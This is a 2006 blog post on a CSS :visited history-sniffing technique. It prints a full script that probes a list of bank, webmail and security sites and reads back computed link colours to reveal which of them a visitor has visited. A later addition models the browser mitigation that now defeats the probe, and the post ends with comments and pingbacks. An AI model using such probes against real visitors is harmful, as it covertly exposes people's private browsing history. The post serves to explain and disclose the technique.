Stealing History

Update: Cody Swan has a version that works in IE and supports AJAX to log the URLs somewhere. Info here.

Jeremiah Grossman has demonstrated an interesting way to sniff out browser history via CSS hacks [1]. IE7 RC1 is smart enough to block the site, but Firefox lists my history without any complaints. Spooky. The script is embedded on the page, and the basic technique involves setting the visited link color via CSS on a group of links to common sites, then getting the computed values of those links and seeing which ones have the visited color. Very clever way to hijack someone's history:

<script>
var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);

// popular websites. Look up whether the user has visited any.
var websites = [
    "http://login.yahoo.com/",
    "http://www.jailbabes.com",
    "http://ha.ckers.org",
    "http://seoblackhat.com",
    "http://www.cgisecurity.com",
    "http://www.spidynamics.com",
    "http://www.cenzic.com",
    "http://www.watchfire.com",
    "http://www.ntobjectives.com",
    "http://www.webappsec.org",
    "http://www.whitehatsec.com",
    "http://english.aljazeera.net/HomePage",
    "http://mail.google.com/",
    "http://mail.yahoo.com/",
    "http://my.yahoo.com/",
    "http://slashdot.org/",
    "http://www.myspace.com/",
    "http://www.amazon.com/",
    "http://www.aol.com/",
    "http://www.bankofamerica.com/",
    "http://www.bankone.com/",
    "http://www.blackhat.com/",
    "http://www.blogger.com/",
    "http://www.bofa.com/",
    "http://www.capitalone.com/",
    "http://www.chase.com/",
    "http://www.citibank.com/",
    "http://www.cnn.com/",
    "http://www.comerica.com/",
    "http://www.e-gold.com/",
    "http://www.ebay.com/",
    "http://www.etrade.com/",
    "http://www.google.com/",
    "http://www.hsbc.com/",
    "http://www.icq.com/",
    "http://www.microsoft.com/",
    "http://www.msn.com/",
    "http://www.myspace.com/",
    "http://www.passport.net/",
    "http://www.paypal.com/",
    "http://www.sourceforge.net/",
    "http://www.statefarm.com/",
    "http://www.usbank.com/",
    "http://www.wachovia.com/",
    "http://www.wamu.com/",
    "http://www.wellsfargo.com/",
    "http://www.xanga.com/",
    "http://www.yahoo.com/",
    "https://commerce.blackhat.com/",
    "https://banking.wellsfargo.com/"
];

/* prevent multiple XSS loads */
if (! document.getElementById('xss_flag')) {

    var d = document.createElement('div');
    d.id = 'xss_flag';
    document.body.appendChild(d);

    var d = document.createElement('table');
    d.border = 0;
    d.cellpadding = 5;
    d.cellspacing = 10;
    d.width = '90%';
    d.align = 'center';
    d.id = 'data';
    document.body.appendChild(d);

    // one :visited rule per probe link, all using the same marker color
    document.write('<style>');
    for (var i = 0; i < websites.length; i++) {
        document.write('#id' + i + ":visited {color: #0000FF;}");
    }
    document.write('</style>');

    /* launch steal history */
    if (is_mozilla) {
        stealHistory();
    }

}


/*--- [method: stealHistory] -------------------------------------------#
# Description: Send a browser's history to an off-domain URL.           #
-----------------------------------------------------------------------*/
function stealHistory() {

    // loop through websites and check which ones have been visited
    for (var i = 0; i < websites.length; i++) {

        var link = document.createElement("a");
        link.id = "id" + i;
        link.href = websites[i];
        link.innerHTML = websites[i];

        // the link only needs to exist long enough for its style to be computed
        document.body.appendChild(link);
        var color = document.defaultView.getComputedStyle(link, null).getPropertyValue("color");
        document.body.removeChild(link);

        // check for visited: the marker color only applies if the URL is in history
        if (color == "rgb(0, 0, 255)") {
            document.write('<li><a href="' + websites[i] + '">' + websites[i] + '</a></li>');
        } // end visited check

    } // end visited website loop

} // end stealHistory method

</script>
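Why this probe no longer works in current browsers, as an added example that is not part of the original post or of the script above: a small JavaScript model of the :visited privacy mitigation browsers adopted a few years after this post (Firefox 4 and its contemporaries). The browser enforces two rules. First, a :visited rule may only change a short list of colour properties, and the alpha channel is taken from the unvisited colour, so visited state can never alter layout or visibility. Second, every style value that script can observe (getComputedStyle and similar APIs) is reported as if the link were unvisited. The rule objects, the default styles and the names `renderedStyle`, `scriptVisibleStyle` and `probeReportsVisited` are constructs of this example, not browser APIs; the real logic lives inside the style engines.

```javascript
// Model of the :visited privacy mitigation, constructed for this page.
// Not browser source code and not part of the original post.

// Properties a :visited rule is allowed to change; everything else in a
// :visited rule is ignored. Layout-affecting properties such as display,
// width or font are deliberately absent.
const VISITED_STYLABLE = new Set([
  "color", "background-color", "border-color", "outline-color",
  "column-rule-color", "fill", "stroke",
]);

// Constructed user-agent defaults every link starts from.
const UA_DEFAULTS = {
  color: "rgb(0, 0, 238)",
  "background-color": "rgba(0, 0, 0, 0)",
  display: "inline",
};

// Parse "#RRGGBB", "rgb(r, g, b)" or "rgba(r, g, b, a)" into [r, g, b, a].
function parseColor(c) {
  const s = c.trim();
  let m = /^#([0-9a-f]{6})$/i.exec(s);
  if (m) {
    const n = parseInt(m[1], 16);
    return [(n >> 16) & 255, (n >> 8) & 255, n & 255, 1];
  }
  m = /^rgba?\(\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*(?:,\s*([\d.]+)\s*)?\)$/i.exec(s);
  if (!m) throw new Error("unsupported colour syntax: " + c);
  return [Number(m[1]), Number(m[2]), Number(m[3]), m[4] === undefined ? 1 : Number(m[4])];
}

// Serialise the way computed style does: rgb() when opaque, rgba() otherwise.
function formatColor([r, g, b, a]) {
  return a === 1 ? `rgb(${r}, ${g}, ${b})` : `rgba(${r}, ${g}, ${b}, ${a})`;
}

// rules: [{ selector: "a" | "a:visited", props: { cssProperty: value } }]
// Returns the style the renderer actually paints for one link.
function renderedStyle(rules, isVisited) {
  const style = { ...UA_DEFAULTS };
  // Unvisited rules apply to every link, visited or not.
  for (const r of rules) {
    if (r.selector === "a") Object.assign(style, r.props);
  }
  if (isVisited) {
    for (const r of rules) {
      if (r.selector !== "a:visited") continue;
      for (const [prop, value] of Object.entries(r.props)) {
        // Mitigation 1a: non-colour properties in :visited are dropped.
        if (!VISITED_STYLABLE.has(prop)) continue;
        // Mitigation 1b: alpha is inherited from the unvisited colour, so
        // :visited cannot hide a link or reveal it through transparency.
        const [red, green, blue] = parseColor(value);
        const alpha = prop in style ? parseColor(style[prop])[3] : 1;
        style[prop] = formatColor([red, green, blue, alpha]);
      }
    }
  }
  // Normalise colour values the way computed style reports them.
  for (const prop of VISITED_STYLABLE) {
    if (prop in style) style[prop] = formatColor(parseColor(style[prop]));
  }
  return style;
}

// Mitigation 2: what script can observe (getComputedStyle and similar
// APIs) is always the UNVISITED style, whatever the history says.
function scriptVisibleStyle(rules, isVisited) {
  void isVisited; // deliberately ignored
  return renderedStyle(rules, false);
}

// The probe from the post, replayed against the model: colour a link blue
// only when visited, then read the colour back through the script API.
function probeReportsVisited(isVisited) {
  const rules = [
    { selector: "a", props: { color: "#000000" } },
    { selector: "a:visited", props: { color: "#0000FF" } },
  ];
  return scriptVisibleStyle(rules, isVisited).color === "rgb(0, 0, 255)";
}

console.log("probe on a visited link reports:", probeReportsVisited(true));     // false
console.log("probe on an unvisited link reports:", probeReportsVisited(false)); // false
```

The user still sees visited links in a different colour, because `renderedStyle` applies the visited colour when painting; the page just cannot read it back, and a :visited rule that tries `display: none` or a transparent colour to leak the state through layout or hit-testing is neutralised before it reaches the renderer.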

[1] http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html

Published Friday, August 25, 2006 12:15 AM by Jesse Ezell

Comments

# Interesting Finds: August 24, 2006

Thursday, August 24, 2006 10:35 PM by Jason Haley

# http://digg.com/security/a_css_hack_to_steal_your_browser_history_in_firefox

Friday, August 25, 2006 5:34 PM by TrackBack

# Stealing History (Part 2)

Saturday, August 26, 2006 3:36 PM by Jesse Ezell Blog

Cody Swann has a modified version of the exploit using prototype that works in IE and has support for

# re: Stealing History

Tuesday, October 03, 2006 8:22 PM by WebMaster ToolBox

Cool, but totally useless, no?

Unless you want to check if a certain person visited your website or not...

# re: Stealing History

Wednesday, May 16, 2007 4:35 AM by i.write.code

Not really, it's good for Blackhat SEO folks. Besides, think of what benefits Google gets out of monitoring your search preferences through their Toolbar and in Gmail.

Ads pay and relevant ads pay even more...

# Ledokin » A CSS Hack to steal your browser history in Firefox

Saturday, November 10, 2007 11:50 AM by Ledokin » A CSS Hack to steal your browser history in Firefox

Pingback from Ledokin » A CSS Hack to steal your browser history in Firefox

# jeremiah s complaints

Thursday, June 12, 2008 1:31 PM by jeremiah s complaints

Pingback from jeremiah s complaints

# hacking » Blog Archive » A CSS Hack to steal your browser history in Firefox

Pingback from hacking » Blog Archive » A CSS Hack to steal your browser history in Firefox
